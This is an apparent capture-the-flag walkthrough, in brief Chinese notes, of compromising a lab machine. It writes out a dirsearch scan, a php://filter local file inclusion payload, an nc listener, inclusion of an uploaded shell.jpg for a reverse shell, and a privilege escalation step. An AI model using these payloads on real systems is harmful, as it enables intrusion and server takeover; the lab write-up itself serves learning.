信息收集
./dirsearch.py --random-agents -u ‘http://192.168.17.142:8011/’ -e *
扫描目录
Bak泄露
John frank
登陆到development
Uploader可以上传
先看8081
Api
成功
可以包含出apache的一些服务
file=php://filter/read=convert.base64-encode/resource=/var/www/development/uploader/upload.php
FRANKuploads
Nc -lvp 4235
file=/var/www/development/uploader/FRANKuploads/shell.jpg包含可以反弹shell
python -c 'import pty;pty.spawn("/bin/bash")'
Uname-a
获取shell
提权
获取编号15285
获得flag
